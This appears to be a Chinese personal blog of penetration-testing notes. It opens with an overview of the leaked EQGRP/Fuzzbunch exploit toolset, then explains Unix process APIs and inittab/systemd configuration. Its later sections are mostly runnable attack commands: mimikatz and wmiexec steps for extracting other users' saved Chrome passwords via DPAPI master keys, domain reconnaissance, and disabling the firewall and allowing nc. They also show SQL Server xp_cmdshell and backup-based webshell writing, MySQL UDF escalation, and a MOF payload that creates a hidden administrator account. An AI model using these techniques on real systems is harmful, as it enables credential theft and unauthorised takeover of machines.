工具集：https://github.com/x0rz/EQGRP_Lost_in_Translation
Fuzzbunch: https://github.com/fuzzbunch/fuzzbunch

EQGRP_Lost_in_Translation中：

EXPLODINGCAN 是 IIS 5/6 远程漏洞利用工具
ETERNALROMANCE 是 SMB1 的重量级利用，可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限，漏洞编号为MS17-010，已于 2017 年 3 月修复。
除此之外 ERRATICGOPHER 、ETERNALBLUE 、ETERNALSYNERGY 、ETERNALCHAMPION 、EDUCATEDSCHOLAR、 EMERALDTHREAD 等都是 SMB 漏洞利用程序，可以攻击开放了 445 端口的 Windows 机器，且基本都已修复于 2017 年 3 月。
ESTEEMAUDIT 是 RDP 服务的远程漏洞利用工具，可以攻击开放了3389 端口且开启了智能卡登陆的 Windows XP 和 Windows 2003 机器。
FUZZBUNCH 是一个类似 MetaSploit 的漏洞利用平台。
ODDJOB 是无法被杀毒软件检测的 Rootkit 利用工具。
ECLIPSEDWING 是 Windows 服务器的远程漏洞利用工具，漏洞编号为MS08-067，修复于2008年。
ESKIMOROLL 是 Kerberos 的漏洞利用攻击，可以攻击开放了 88 端口的 Windows 2000/2003/2008/2008 R2 的域控制器，漏洞编号为MS14-068，修复于2014年。

常用的，DarkPulsar 是一个用户空间的后门程序，而 DoublePulsar 是一个内核级别的后门。
检测：https://github.com/WithSecureLabs/doublepulsar-detection-script
NSA这个工具集对内网很好用，而且用python写的很好改，感觉用的人也不多。

31 C0
40 90
74 08

这段shellcode很神奇在32/64bit下反编译效果正好相反

#32bit始终不会跳转Function
31 C0        xor eax, eax
40           inc eax
90           nop
74 08        je Function
#64bit始终会跳转Function
31 C0        xor eax, eax
40 90        xchg eax, eax
74 08        je Function

1. fork

CSAPP中对这个比喻很形象，就是从master线中分叉出来了一条子进程，与父进程共享文件描述符和所有其他资源。

#include <unistd.h>

pid_t fork(void);

2. exec

这是一个函数族，包含了几个函数

#include <unistd.h>
 
int execl(const char *path, const char *arg, ...);
int execlp(const char *file, const char *arg, ...);
int execle(const char *path, const char *arg,..., char * const envp[]);
int execv(const char *path, char *const argv[]);
int execvp(const char *file, char *const argv[]);
int execvpe(const char *file, char *const argv[],char *const envp[]);
 
#参数说明：
#path：可执行文件的路径名字
#arg：可执行程序所带的参数，第一个参数为可执行文件名字，没有带路径且arg必须以NULL结束
#file：如果参数file中包含/，则就将其视为路径名，否则就按 PATH环境变量，在它所指定的各目录中搜寻可执行文件。

后缀的意思：
l：表示 "list"，这意味着参数以可变参数列表（variable argument list）的形式传递，最后一个参数为 NULL，用于标识参数列表的结束。
p：表示 "path"，这意味着在系统的 PATH 环境变量中搜索可执行文件。
e：表示 "environment"，这意味着可以指定环境变量。
v：表示 "vector"，这意味着参数以数组的形式传递，数组中每个元素都是一个字符串指针。

不管哪种exec，都有一个共性：会用一个程序完全取代当前的程序。
换句话说，这是一个有去无回的动作，可以将当前进程完全转变成另一个进程。

fork和exec是其他的基础。

3. system

参考man-pages，system实际上就是fork和exec的结合。

#include <unistd.h>

pid_t fork(void);

简而言之就是用fork生成一个新进程，然后父进程wait，等待子进程结束。子进程用exec执行命令。

int system(const char * cmdstring)
{
  pid_t pid;
  int status;
 
  if(cmdstring == NULL){
      
      return (1);
  }
  if((pid = fork())<0){
        status = -1;
  }
  else if(pid == 0){
    execl("/bin/sh", "sh", "-c", cmdstring, (char *)0);
    -exit(127); //子进程正常执行则不会执行此语句
    }
  else{
        while(waitpid(pid, &status, 0) < 0){
          if(errno != EINTER){
            status = -1;
            break;
          }
        }
    }
    return status;
}

4. spawn

#include <spawn.h>

int posix_spawn(pid_t *restrict pid, const char *restrict path,
                const posix_spawn_file_actions_t *restrict file_actions,
                const posix_spawnattr_t *restrict attrp,
                char *const argv[restrict],
                char *const envp[restrict]);
int posix_spawnp(pid_t *restrict pid, const char *restrict file,
                const posix_spawn_file_actions_t *restrict file_actions,
                const posix_spawnattr_t *restrict attrp,
                char *const argv[restrict],
                char *const envp[restrict]);

按照man-pages的说法，spawn是为了给不支持fork的系统提供标准化方法(standardized method)，主要针对小型嵌入式系统。并且文中提到，spawn是syscall实现功能的子集。

两种spawn有什么区别？

With posix_spawnp(), the executable file is specified as a simple filename; the system searches for this file in the list of directories specified by PATH (in the same way as for execvp(3).
也就是说posix_spawnp后缀的p也是指代PATH

那么spawn和system，fork有什么区别呢？
根据多处文档（BlackBerry|qnx、Oracle Solaris Blog、The Open Group)以及《理解Unix进程》- Jesse Storimer中描述：

system会阻塞到命令完成，而spawn会直接返回。

fork子进程有两个特点：1.获得父进程的文件描述符 2.获得父进程所有内存。而spawn只保留了1，没有保留2。也就是说spawn比fork更轻便，性能更好，在进程切换的过程中开销更小。但也因为没有内存的内容，缺少了灵活性。

从实现层面上，spawn也是通过fork和exec实现，但是和system不同的是在fork之后，子进程中在exec之前做了其他事，而不是像system一样直接调用exec。所以spawn有很多参数，能指定更改环境变量。

5. popen

pipe open
创建一个管道，并启动一个子进程进行命令的执行。它返回一个文件指针，该文件指针指向子进程的标准输入或标准输出，具体取决于 popen 函数的第二个参数。注意，无法一次访问所有的流。
对应还有pclose。

#include <stdio.h>

FILE *popen(const char *command, const char *type);
int pclose(FILE *stream);

popen 函数返回的文件指针可以像普通文件指针一样使用标准的文件 I/O 函数，如 fread、fwrite、fgets、fputs 等。

什么时候说什么样的话，对什么人，怎么说，心里头时刻有一根弦要绷着的。

inittab

现代Linux已用systemd取代了inittab，并将inittab的功能集成在了systemctl中。可以通过编写适当的.service文件并将其放置在/etc/systemd/system/目录下，然后使用systemctl命令来管理和控制这些服务。这是在现代Linux中定义和管理初始化进程的推荐方式。参考SysVinit

但是现代Linux中依然有部分发行版支持自建/etc/inittab，如Arch

ArchWiki中明确指出：重启之前，务必使用 telinit q 测试修改过的 /etc/inittab，任何小小的语法错误都将导致系统无法启动。

可以通过pstree观察PID为1是否为inittab确定是否可用，以及/etc/inittab是否存在判断。并且，虽然现代Linux用systemd取代了，但是其他Unix系统如AIX，以及老的（占有率其实很高）Linux还在用，所以学这个是有意义的。
每个inittab文件条目由四个字段组成，字段之间使用冒号（:）进行分隔。格式如下：

Identifier:RunLevel:Action:Command

Identifier（标识）：一个用于唯一标识该条目的字符串，可以是一个或多个字符。
RunLevel（运行级别）：指定可以在哪个运行级别下处理该条目。运行级别与系统中的进程配置相对应，使用数字0到9表示。例如，如果系统处于运行级别1，那么只有RunLevel字段中包含1的条目才会启动。如果没有指定任何运行级别，那么假定该进程在所有运行级别下都有效。
Action（操作）：指示初始化命令如何处理指定进程。
    respawn：如果该进程不存在，请启动它。在进程终止时，重新启动该进程。
    wait：启动该进程并等待它的终止。当进入与条目的运行级别匹配的运行级别时，执行该操作。
    once：启动该进程，并且不等待其终止。当它终止时，不要重新启动该进程。
    boot：启动该进程，但不等待其终止。只在系统引导期间执行一次。
    off：在系统引导期间不启动该进程。
Command（命令）：要执行的命令或脚本。命令用“”包裹，或者填入脚本路径。

每个条目都以换行符分隔，可以使用反斜杠（\）表示条目的连续。可以在行的开头使用冒号（:）将条目注释掉。
另外要注意Identifier必须唯一，不能冲突，Runlevel不同发行版可能有所不同。

.service

一个典型的.service文件包含以下几个部分：

[Unit]：这个部分定义了服务的基本信息，包括服务名称、描述、依赖关系等。
    Description：描述服务的简短说明。
    Requires：定义服务所依赖的其他服务。
    After：定义服务在哪些其他服务之后启动。
[Service]：这个部分定义了服务的执行参数和行为。
    Type：指定服务的类型，可以是simple（默认值）、forking、oneshot、dbus、notify等。
    ExecStart：指定服务启动时要执行的命令或脚本。
    Restart：定义服务在发生故障时的重启行为。
    WorkingDirectory：指定服务运行的工作目录。
    User和Group：指定服务运行的用户和用户组。
[Install]：这个部分定义了服务的安装配置。
    WantedBy：定义服务在哪个target或目标中激活。

示例

[Unit]
Description=My Service
After=network.target

[Service]
Type=simple
ExecStart=/usr/bin/my-service
Restart=always
WorkingDirectory=/path/to/service
User=myuser
Group=mygroup

[Install]
WantedBy=multi-user.target

原理

chrome储存的明文密码时使用windows提供的DPAPI进行对称加密来保证安全性。加解密的密钥称为master key。master key被用户登录密码、SID和16字节随机数加密后保存在Master Key file（%APPDATA%\Microsoft\Protect\%SID%）中。

三种情况

1.A用户获取自己chrome密码不需要知道master key
2.A获取B用户，如果B用户在线，那么可以直接从内存中抓取出B的maste key
3.A获取B用户，B不在线，就需要用b用户的明文密码或者NTLM hash计算出master key,在回到上面一步。

1、获取自己的chrome密码

dpapi::chrome /in:'C:\Users\<UserName>\AppData\Local\Google\Chrome\User Data\Default\Login Data' /unprotect

2、获取在线用户的密码

因为用户在线，所以用mimikatz抓内存即可
impacket/examples/wmiexec.py

privilege::debug
sekurlsa::dpapi

python wmiexec.py <UserName>:<password>@<ip> 'path/to/mimikatz "privilege::debug" "sekurlsa::dpapi" exit'

导出之后关注两个值
MasterKey
sha1(key)

#wmiexec.py/smbexec.py/psexec.py都可以
python wmiexec.py <UserName>:<password>@<ip> 'cd c:\users\public && Minimimini64.exe "dpapi::chrome /in:\"C:\Users\<UserName>\AppData\Local\Google\Chrome\User Data\Default\Login Data\" /masterkey:<your/MasterKey/or/sha1(key)>" exit '

3、获取离线用户密码

如果我们知道用户xxx的明文密码，可以用runas降权(或者进行一些spwan的操作降权)，降权之后又回到了最简单的情况。（因为runas需要交互式shell，所以这种方法比较鸡肋）

runas /user:<UserName>@<domainName> "cmd.exe"

在没有交互式的情况下可以直接用mimikatz直接算出master key
1.知道明文密码

dpapi::masterkey /in:"c:\Users\<UserName>\AppData\Roaming\Microsoft\Protect\<直到最后一个文件>" /password:<password>

有结果之后继续按照第2种情况
2.知道NTLM hash

dpapi::masterkey /in:"c:\Users\<UserName>\AppData\Roaming\Microsoft\Protect\<直到最后一个文件>" /hash:<NTLM hash>

有结果之后继续按照第2种情况

该说些什么呢？还是什么都不说吧

域信息
很多命令和工具都是重复造轮子，记住几个常用，用的顺手的即可。

#用ipconfig /all查看当前主机的域信息（systeminfo也能显示域和DC信息，如果域为WORKGROUP，则不在域中）
#"Primary Dns Suffix"或"DNS Suffix Search List"（主DNS后缀，DNS后缀搜索列表）会显示域信息
#直接查询域
net view /domain
#查看DC信息
nltest /dclist:<域的名称>
#查看DC的详细信息
nltest /server:<DC主机名> /serverinfo
#查看当前登陆的域信息(查看如当前登陆用户是本地用户还是域用户）
net config workstation
#判断主域（存在域林的时候）（通常主域服务器也作为时间服务器）
#主域是一个逻辑概念，代表了域林中具有特殊角色和权限的域。它可以由多台域控制器组成，这些域控制器可以在不同的服务器上部署，以实现高可用性和负载均衡。
net time /domain

#查询域内所有计算机
net view /doamin:<域的名称>
#查询域内所有组
net group /domain
#查询组内所有计算机
net group "<组名>" /domain
#获取用户的详细信息
wmic useraccount get /all
#查询域密码策略
net accounts /domain

#dsquery
dsquery computer - 查找目录中的计算机。
dsquery contact - 查找目录中的联系人。
dsquery subnet - 查找目录中的子网。
dsquery group - 查找目录中的组。
dsquery ou - 查找目录中的组织单位。
dsquery site - 查找目录中的站点。
dsquery server - 查找目录中的 AD DC/LDS 实例。
dsquery user - 查找目录中的用户。
dsquery quota - 查找目录中的配额规定。
dsquery partition - 查找目录中的分区。
dsquery * - 用通用的 LDAP 查询来查找目录中的任何对象。

#快速探测内网主机
for /L %I in (1,1,255) do @ping -w 1 -n 1 192.168.0.%I | findstr "TTL="
#查询域内某台主机的ip
nslookup <域内机器名称>

#查询与本机有关的共享文件夹
net share
#wmic也能查看共享文件夹
wmic share get name,path,status
#查询当前用户SID
whoami /all
#查询指定用户的详细信息
net user XXX /domain

#查看计划任务
schtasks /query /fo LIST /v
#获取本地管理员（通常包含域用户）信息
net localgroup administrators
#查看当前在线用户
query user || qwinsta
#除了systeminfo，还能用WMI查看安装在系统中的补丁
wmic qfe get Caption,Description,HotFixID,InstalledOn

防火墙

#***关闭防火墙***
#windows server 2003之前
netsh firewall set opmode disable
#windows server 2003之后
netsh advfirewall set allprofiles state off
#查看防火墙配置
netsh firewall show config
#windows server 2003之前 允许指定程序全部连接
netsh firewall add allowedprogram <path/to/program> "allow nc" enable
#windows server 2003之后 允许指定程序入网
netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="<path/to/program>"
#允许指定程序出网
netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="<path/to/program>"
#自定义防火墙日志的存储位置
netsh advfirewall set currentprofile logging filename "<path/to/file.log>"

查看代理

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
#注册表可以用HKCU代替HKEY_CURRENT_USER;HKLM代替HKEY_LOCAL_MACHINE
#HKEY_CLASSES_ROOT (HKCR)：包含文件关联、COM组件和注册表映射等信息。
#HKEY_CURRENT_USER (HKCU)：包含当前用户的配置信息。
#HKEY_LOCAL_MACHINE (HKLM)：包含计算机的全局配置信息。
#HKEY_USERS (HKU)：包含所有用户配置信息的顶级节点。
#HKEY_CURRENT_CONFIG (HKCC)：包含当前系统配置信息。

Windows RDP

#允许3389端口放行
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
#开启RDP
#windows 2003
wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
#暂时不知(__CLASS !="")这个过滤是否多于
#windows 2003之后
wmic /namespace:\\root\cimv2\terminalservices path Win32_TerminalServiceSetting where (__CLASS !="") call Set AllowTSConnections=1
#还有一种where (TerminalName='RDP-Tcp')的过滤，更加精确，但是似乎只在winserver2012起作用

SQL Server

1. xp_cmdshell

可以直接通过cmd执行命令，限制少。但是xp_cmdshell是扩展存储过程（Extended Stored Procedure），需要dll支持，默认情况不开启。

#查看xp_cmdshell是否开启，返回1开启，0关闭
select count(*) FROM master..sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'  
#若关闭，重新开启（需要xplog70.dll）
dbcc addextendedproc("xp_cmdshell","xplog70.dll");
#两种方式执行
exec xp_cmdshell 'whoami';
EXEC master..xp_cmdshell 'whoami'

2. sp_oacreate & sp_oamethod

与xp_cmdshell区别是sp_xxx为标准的存储过程，sqlserver自带。但是限制多，sp_oacreate等通过COM（Component Object Model）对象实现，不能达到cmd那样执行的权限。

#查看sp_oacreate是否可用，0为可用，1为不可用
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'whoami'
#如果不可用，可尝试开启
EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;
#此方法无回显，但可以写到文件中查看
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\test.txt' 

3. OPENROWSET

见《SQL注入攻击与防御》提权章节

4. 数据库差异备份写webshell

差异备份（Differential Backup）会备份自上次完整备份以来发生的更改部分，而不是仅仅与之前备份不相同的内容。它会将自上次完整备份以来的所有更改都保存到差异备份文件中，而不会重复保存相同的内容。
条件：
1.用户权限足够大（DBA or SA）
2.目标目录可写
3.知道网站绝对路径

#第一步
create DATABASE Testdb;
#第二步
backup database Testdb to disk = 'c:\test2.bak';
use Testdb;
create table [dbo].[Testdb] ([cmd] [image]);
insert into Testdb(cmd) values(0x3c3f70687020706870696e666f28293b3f3e);
#3c3f70687020706870696e666f28293b3f3e为ASCII对应16进制的<?php phpinfo();?>
#第三步 DIFFERENTIAL对应差异备份
backup database Testdb to disk='C:\\phpinfo.php' WITH DIFFERENTIAL,FORMAT;

5. 日志差异备份写webshell

日志备份重复性好、多次备份的成功率高，相对于差异备份而言，shell的体积较小。因此一般采用日志备份。LOG备份的要求是他的数据库备份过，而且选择恢复模式得是完整模式，至少在2008上是这样的。
其利用条件如下：
1.用户权限足够大（DBA）
2.数据库已完整备份过一次
3.目标目录可写
4.知道网站绝对路径

create database Testdb      --新建数据库Testdb
alter database Testdb set RECOVERY FULL;   --修改数据库恢复模式为 完整模式
create table cmd (a image);        --创建一张表cmd，只有一个列 a，类型为image
backup log Testdb to disk= 'C:\\1.php' with init;   --备份表到指定路径
insert into cmd (a) values(0x3c3f706870706870696e666f28293b3f3e);  --插入一句话到cmd表里
backup log Testdb to disk='C:\\phpinfo.php';   --把操作日志备份到指定文件

MySQL

手工可看https://xz.aliyun.com/t/10373，非常详尽

1. UDF

UDF和存储过程比较像，区别在于
1.返回结果：UDF必须返回一个值，可以是标量值（如整数、字符串等）或表值（返回一张结果集）。存储过程可以执行一系列操作，但它不需要返回结果。
2.使用方式：UDF通常在查询中使用，可以像内置函数一样调用。存储过程通常通过执行存储过程的语句来调用，可以包含输入和输出参数。
使用条件：
1.mysql有写入文件的权限，即secure_file_priv的值为空
2.有udf.dll且在指定路径下

1.系统版本为：Server 2003、Windows XP、Windows 7及以下版本
2.mysql的root用户密码
3.UDF存放目录：
mysql<5.2，存在于系统目录c:/windows/system32/；
mysql>5.2，存在于安装目录MySQL\Lib\Plugin\
#如果没有，sqlmap和msf也带了dll
##sqlmap：
###/opt/sqlmap/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
###/opt/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
##解码脚本：
###/opt/sqlmap/extra/cloak/cloak.py
##msf：
###/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys.dll

用法：

# 创建一个 MySQL 函数，将其与 udf.dll 中的函数关联起来
CREATE FUNCTION <udf_func_name> RETURNS STRING SONAME 'udf.dll';
# 之后就可以使用：
SELECT <udf_func_name>('command');

网上有很多利用工具

https://github.com/T3st0r-Git/HackMySQL

2. MOF

MOF（Managed Object Format）文件是一种文本文件，用于定义和描述管理对象的结构和行为。WMI（Windows Management Instrumentation）是Windows操作系统中的一项管理技术，它使用 MOF 文件来描述和管理系统资源、配置和性能。在 Windows 系统中，WMI 服务会周期性地检测并加载系统中的 MOF 文件。这些 MOF 文件中定义了管理对象的属性、方法和关联关系。一旦 MOF 文件被加载，其中的定义将被解析并注册到 WMI 服务中，使得相关的管理对象可以被访问和操作。
攻击者利用已获取的高权限（如 MySQL 的 root 权限）来上传恶意的 MOF 文件到系统中。攻击者通常会将 MOF 文件存放在系统的特定目录（如C:/Windows/System32/wbem/mof）下。然后，攻击者会使用合法的权限注册该 MOF 文件，使其能够被 WMI 服务加载。
所以 很显而易见，只能在Windows上用，而且一般低版本系统才可以用，比如xp、server2003
以下是一个mof文件例子

#test.mof
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
  EventNamespace = "Root\\Cimv2";
  Name = "filtP2";
  Query = "Select * From __InstanceModificationEvent "
          "Where TargetInstance Isa \"Win32_LocalTime\" "
          "And TargetInstance.Second = 5";
  QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
  Name = "consPCSV2";
  ScriptingEngine = "JScript";
  ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user test test123 /add\")\nWSH.run(\"net.exe localgroup administrators test /add\")";
};

instance of __FilterToConsumerBinding
{
  Consumer   = $Consumer;
  Filter = $EventFilter;
};

#payload：
select load_file("path/to/test.mof") into dumpfile "path/to/store/mofFile"

MSF

msf中自带UDF和MOF提权模块

失败没什么大不了的，还记得那句话吗？

我觉得自己会永远生猛下去，什么也锤不了我。

振作起来！